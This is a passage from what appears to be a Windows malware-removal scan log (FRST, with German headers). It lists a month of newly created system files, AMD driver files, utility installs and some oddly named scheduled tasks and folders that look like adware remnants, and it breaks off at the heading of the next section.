2016-04-15 17:10 - 2016-03-16 05:55 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 01416192 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00511488 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:46 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:44 - 01016832 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 01290240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-04-15 17:10 - 2016-03-16 05:41 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00931840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00280576 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 03363328 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-15 17:10 - 2016-03-16 05:38 - 01423872 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 01521664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 01205248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00068608 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 01794560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00607744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-15 17:10 - 2016-03-16 05:34 - 01871872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-15 17:10 - 2016-03-16 05:32 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:28 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:27 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:21 - 18796544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:20 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 03680256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:16 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00625152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:12 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:11 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:10 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-15 16:58 - 2016-04-15 16:58 - 00000000 ____D C:\ProgramData\FwinpF
2016-04-12 18:21 - 2016-04-15 18:00 - 00000000 ____D C:\WINDOWS\Panther
2016-04-12 16:42 - 2016-04-12 16:42 - 00194320 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\TeeDriverW8x64.sys
2016-04-11 20:03 - 2016-04-11 23:21 - 00002278 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-04-11 20:03 - 2016-04-11 20:03 - 00000870 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-04-11 20:03 - 2016-04-11 20:03 - 00000000 ____D C:\Program Files\CCleaner
2016-04-11 15:49 - 2016-04-11 15:49 - 00002904 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-11 13:27 - 2016-04-11 13:27 - 00001299 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Radeon Settings.lnk
2016-04-10 22:05 - 2016-04-10 22:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-04-10 21:55 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\PlaysTV
2016-04-10 21:55 - 2016-04-10 21:55 - 00002099 _____ C:\Users\Public\Desktop\Raptr.lnk
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2016-04-10 21:54 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Raptr
2016-04-10 17:33 - 2016-04-11 15:26 - 00000000 ____D C:\ProgramData\Xfire
2016-04-10 17:33 - 2016-04-11 13:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Xfire
2016-04-10 17:32 - 2016-04-10 17:32 - 00002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-04-10 17:32 - 00002205 _____ C:\Users\Public\Desktop\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-03-29 12:06 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
2016-04-10 17:32 - 2016-03-29 11:53 - 00044304 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\authuitu.dll
2016-04-10 17:32 - 2016-03-29 11:53 - 00039696 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\SysWOW64\authuitu.dll
2016-04-10 17:31 - 2016-04-19 12:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Users\Harun\AppData\Local\AvgSetupLog
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\ProgramData\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-05 09:41 - 2016-04-05 09:41 - 00874000 _____ (AMD) C:\WINDOWS\system32\SETAA8A.tmp
2016-04-05 09:41 - 2016-04-04 04:25 - 00865280 _____ (AMD) C:\WINDOWS\system32\coinst_16.15.dll
2016-04-05 08:47 - 2016-04-05 08:47 - 00365824 _____ C:\WINDOWS\system32\ativvaxy_el_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00322612 _____ C:\WINDOWS\system32\ativvaxy_vi.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00320944 _____ C:\WINDOWS\system32\ativvaxy_vi_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00264736 _____ C:\WINDOWS\system32\ativvaxy_stn_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00260640 _____ C:\WINDOWS\system32\ativvaxy_cz_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00254804 _____ C:\WINDOWS\system32\ativvaxy_FJ.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00251856 _____ C:\WINDOWS\system32\ativvaxy_FJ_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00857576 _____ C:\WINDOWS\system32\amdicdxx.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00234292 _____ C:\WINDOWS\system32\ativvaxy_cik.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00232496 _____ C:\WINDOWS\system32\ativvaxy_cik_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00177280 _____ C:\WINDOWS\system32\ativce03.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00175584 _____ C:\WINDOWS\system32\amde31a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34b.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00100832 _____ C:\WINDOWS\system32\ativce02.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00009184 _____ C:\WINDOWS\system32\AMDKernelEvents.man
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\SysWOW64\amd-vulkan32.json
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\system32\amd-vulkan64.json
2016-04-04 06:16 - 2016-04-04 06:16 - 00458472 _____ C:\WINDOWS\system32\amdmiracast.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00141792 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00128384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00110880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2016-04-04 06:12 - 2016-04-04 06:12 - 00296648 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdacpksd.sys
2016-04-04 05:32 - 2016-04-04 05:32 - 00701440 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2016-04-04 05:30 - 2016-04-04 05:30 - 00580096 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2016-04-04 05:29 - 2016-04-04 05:29 - 00127488 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 06884864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 00113664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2016-04-04 05:27 - 2016-04-04 05:27 - 00235008 _____ C:\WINDOWS\system32\clinfo.exe
2016-04-04 05:26 - 2016-04-04 05:26 - 48211968 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00065024 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00059392 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 26887168 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2016-04-04 05:11 - 2016-04-04 05:11 - 06956032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2016-04-04 05:02 - 2016-04-04 05:02 - 05398016 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2016-04-04 05:00 - 2016-04-04 05:00 - 05420032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00134656 _____ C:\WINDOWS\system32\amdhdl64.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00123392 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2016-04-04 04:47 - 2016-04-04 04:47 - 30377984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\system32\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00097280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00089600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2016-04-04 04:37 - 2016-04-04 04:37 - 08473088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 25069056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2016-04-04 04:22 - 2016-04-04 04:22 - 06667776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00367104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2016-04-04 04:14 - 2016-04-04 04:14 - 00062464 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00055808 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00052224 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 15711744 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 00049152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2016-04-04 04:10 - 2016-04-04 04:10 - 14302208 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00564736 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00224256 _____ C:\WINDOWS\system32\dgtrayicon.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00209920 _____ C:\WINDOWS\system32\GameManager64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00204800 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00189952 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00186368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00162304 _____ C:\WINDOWS\system32\atieah64.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00145408 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00078336 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2016-04-04 03:56 - 2016-04-04 03:56 - 00251392 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2016-04-04 03:55 - 2016-04-04 03:55 - 00190976 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00050688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00039424 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2016-04-04 03:52 - 2016-04-04 03:52 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2016-04-04 03:42 - 2016-04-04 03:42 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2016-04-04 03:34 - 2016-04-04 03:34 - 00089088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2016-04-04 03:34 - 2016-04-04 03:34 - 00080896 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00157696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00075776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2016-04-04 03:29 - 2016-04-04 03:29 - 00043520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00195072 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00174592 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2016-04-03 23:27 - 2016-04-03 23:27 - 02412544 _____ C:\WINDOWS\system32\amdacpusl.pdb
2016-04-03 23:16 - 2016-04-03 23:16 - 00364544 _____ (Advanced Micro Devices) C:\WINDOWS\system32\amdacpusl.dll
2016-04-03 23:16 - 2016-04-03 23:16 - 00306176 _____ C:\WINDOWS\system32\amdacpusl.pdb.pub
2016-04-03 23:16 - 2016-04-03 23:16 - 00248832 _____ (Advanced Micro Devices) C:\WINDOWS\SysWOW64\amdacpusl.dll
2016-04-01 10:14 - 2016-04-10 20:40 - 00000000 ____D C:\Program Files (x86)\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 20:34 - 00014860 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
2016-04-01 10:14 - 2016-04-01 20:34 - 00014834 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
2016-04-01 10:14 - 2016-04-01 20:34 - 00003924 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\Users\Public\Documents\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\ProgramData\eAHPeNhIUJ
2016-03-30 20:14 - 2016-03-30 20:14 - 00000000 _____ C:\Users\Harun\AppData\Roaming\dc.ogt
2016-03-30 13:15 - 2016-03-30 13:15 - 00015110 _____ C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
2016-03-30 13:12 - 2016-03-30 13:12 - 00004200 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
2016-03-30 13:11 - 2016-03-30 13:11 - 00015136 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
2016-03-30 13:08 - 2016-03-30 13:08 - 00000000 ____D C:\Users\Harun\AppData\Local\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Public\Documents\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Harun\AppData\Roaming\ffgogogo
2016-03-24 21:44 - 2016-03-24 21:44 - 00000000 ____D C:\Users\Harun\AppData\Local\TeamViewer
2016-03-23 19:02 - 2016-03-23 19:02 - 00000000 ____D C:\Users\Harun\AppData\Roaming\MCorp

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

